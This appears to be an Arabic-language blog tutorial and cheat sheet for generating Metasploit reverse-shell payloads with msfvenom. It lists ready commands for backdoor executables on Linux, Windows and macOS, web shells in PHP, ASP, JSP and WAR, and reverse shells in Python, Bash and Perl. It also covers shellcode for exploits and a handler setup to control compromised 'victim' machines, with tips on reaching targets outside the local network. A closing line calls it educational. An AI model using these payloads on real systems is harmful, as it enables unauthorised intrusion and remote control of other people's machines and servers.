في مشروع الميتاسبلويت كانت هناك أداة في السابق تسمى MsfPayload منخلالها كنا نقوم بصنع البايلود, اما في النسخ الحديثة قاموا بتغييرها الى أداة msfvenom والتي سنستخدمها في شرحنا موضحة كما في الصورة.
في التعليمات التي سنسردها أسفله تحتاج لضبط بعض التعليمات على حسب احتياجاتك ومتطلبات الثغرة على سبيل المثال:
- تضع مكان LPORT البورت المفتوح في جهازك (مثلا: 88,4444,443) والذي ستتصل عبره مع الضحية, وهو اختصار ل Local Port
- تضع مكان LHost الاي بي الخاص بك, اذا كنت تخترق داخل الشبكة تستعمل الاي بي الداخلي شكله 192.168.1.3 وان كنت تخترق في جهاز خارج الشبكة أي بعيد عنك تدخل الاي بي الخارجي ومن الأفضل النو اي بي No-ip
- في حالات أخرى تجد RHost وهي تعني اي بي الضحية RemoteHost لم نتظرق لها في هذا الشرح.
- عند تعويض التعليمات باعداداتك لا تكتب الرموز الاتي < > مع الاوامر فهي لغرض التوضيح فقط.
- في البايلودات استعملت البايلود العكسي reverse_tcp وهو الأفضل لأنه عندما يشتغل في جهاز الضحية هو من سيتصل بجهازك وبهذا ستتخطى مشكل الجدار الناري. على عكس البايلود bind_tcp وغيره.
لاظهار جميع البايلودات المتوفرة في الميتاسبلويت
msfvenom -l
طريقة تكوين بايلود تنفيذي على أنظمة مختلفة
تكوين بايلود يخترق لينكس
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf
تكوين بايلود يخترق ويندوز
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe
صورة بعد تطبيق الأمر
حجم الباكدور الناتج 73 كيلوبايت بدون تشفير
تكوين بايلود يخترق ماكنتوش
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho
طريقة تكوين بايلود الويب Web Payloads
تكوين بايلود يخترق السيرفرات بصيغة بلغة php
msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
تكوين بايلود يخترق السيرفرات بصيغة بلغة asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
تكوين بايلود يخترق السيرفرات بصيغة بلغة jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
تكوين بايلود يخترق السيرفرات بصيغة بلغة war
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
طريقة تكوين سكربت بايلود Scripting Payloads
تكوين بايلود بلغة بايثون
Python
msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
تكوين بايلود بلغة باش
Bash
msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
تكوين بايلود بلغة بيرل
Perl
msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
طريقة تكوين شيل كود لدمجه في اكسبلويت exploits
بالنسبة لاظهار جميع تعليمات الشيل كود الصالحة، ادخل الأمر الأتي في الطرفية
msfvenom --help-format
Linux Based Shellcode
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Windows Based Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
Mac Based Shellcode
msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>
اعداد المتحكم أو مقبض البايلود Handlers
للتحكم في البايلود بعد اختراق الضحية وجب عليك فتح مشروع الميتاسبلويت بالامر
msfconsoleثم قم بادخال اتعلييمات الأتية:
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
تنويه: هذه المعلومات لأغراض تعليمية فقط، وخدمة للهكر الأخلاقي، وليست بغرض مهاجمة الأنظمة التي لا تملك لها إذن وصول، وما إلى ذلك
قد يهمك أيضا: